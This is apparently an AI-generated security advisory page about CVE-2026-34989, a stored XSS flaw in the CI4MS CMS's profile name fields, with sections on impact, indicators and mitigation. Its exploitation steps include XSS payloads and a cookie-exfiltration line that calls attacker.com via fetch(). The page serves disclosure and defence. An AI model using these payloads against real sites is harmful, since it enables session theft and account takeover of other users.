CVE-2026-34989: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34989 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, that enables authenticated attackers to inject persistent JavaScript payloads via profile name fields, potentially leading to full account takeover and privilege escalation across all user roles. The vulnerability affects all versions up to and including 0.28.6.0 and was disclosed on April 2, 2026, with a patch released in version 31.0.0.0. It carries a CVSS v4 base score of 9.4 (Critical) and a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory).

Technical details

The root cause is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-269 (Improper Privilege Management). The application fails to sanitize user-controlled input in the profile name/full name fields at the point of storage, and subsequently renders these values unsafely across multiple views using DOM sinks such as .html() or innerHTML without output encoding. An attacker with a low-privileged account can submit a malicious payload (e.g., <img src=x onerror=alert(document.domain)>) via the /backend/users/profile/ endpoint; the payload then executes automatically in the browsers of any user — including administrators — who visits affected pages such as /backend/users/ (User Management), blog pages, or other public-facing interfaces that render profile names (GitHub Advisory, CI4MS Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other users, including administrators, enabling session cookie theft, credential capture, unauthorized privileged actions, and full admin account takeover. Because the payload persists server-side and executes across multiple application views — including administrative and public-facing interfaces — a single injection can compromise all roles that view the affected pages. This creates a clear path for privilege escalation from a low-privileged user to full application compromise (GitHub Advisory).

Exploitability

A proof-of-concept (PoC) with step-by-step reproduction instructions and a video demonstration is publicly available in the GitHub Security Advisory, making exploitation straightforward for any authenticated user (CI4MS Advisory). The EPSS score is approximately 0.047% (16th percentile), indicating a currently low but non-negligible probability of exploitation in the wild within 30 days. There is no confirmed evidence of active in-the-wild exploitation or threat actor attribution at this time, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Obtain a low-privileged account: Register or log in to a CI4MS instance running version ≤ 0.28.6.0 with any authenticated user account.
  2. Navigate to Profile Management: Access the profile update page at /backend/users/profile/.
  3. Inject XSS payload: In either of the two Full Name input fields, enter a malicious JavaScript payload such as <img src=x onerror=alert(document.domain)> or a more targeted payload to exfiltrate cookies (e.g., <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">).
  4. Save the profile: Submit the form to store the unsanitized payload server-side.
  5. Wait for privileged user interaction: The payload executes automatically whenever any user (including administrators) visits pages that render the attacker's profile name, such as /backend/users/ (User Management page), blog pages, or other public-facing views.
  6. Capture session tokens: Collect the exfiltrated session cookies or credentials from the attacker-controlled server and use them to hijack the victim's session, achieving privilege escalation or full account takeover (CI4MS Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains containing URL-encoded cookie or session data (e.g., GET https://attacker.com/?c=<session_token>); unusual JavaScript-initiated requests originating from admin browser sessions.
  • Logs: Web server access logs showing POST requests to /backend/users/profile/ with HTML/JavaScript content in the name parameter body; repeated access to /backend/users/ by the attacker's account shortly before admin session anomalies.
  • File System / Database: Profile name fields in the database containing HTML tags or JavaScript syntax (e.g., <script>, <img src=x onerror=, javascript:) rather than plain text.
  • Process/Behavior: Unexpected administrative actions (role changes, new admin accounts, configuration modifications) occurring in sessions that follow an administrator viewing the User Management page (CI4MS Advisory).

Mitigation and workarounds

Upgrade CI4MS to version 31.0.0.0, which contains the official fix for this vulnerability (GitHub Advisory). As an interim workaround for deployments that cannot immediately upgrade, implement strict server-side input validation and sanitization on all profile name fields before storing values, replace unsafe DOM manipulation methods (.html(), innerHTML) with safe alternatives (.text(), textContent), apply context-appropriate HTML entity encoding on all user-controlled output, and deploy a Content Security Policy (CSP) header to limit the impact of any injected scripts. Auditing all application views that render user-supplied profile data for unsafe output encoding is also strongly recommended.

Community reactions

The vulnerability was reported by researchers bugmithlegend and peeefour and published by bertugfahriozer to the CI4MS repository on April 2, 2026 (CI4MS Advisory). A video PoC was made available via Mega.nz alongside the advisory. The vulnerability was picked up by automated vulnerability tracking platforms including VulDB, CVEFeed, and Bluesky CVE feeds shortly after disclosure, reflecting standard community monitoring activity with no notable broader media coverage identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management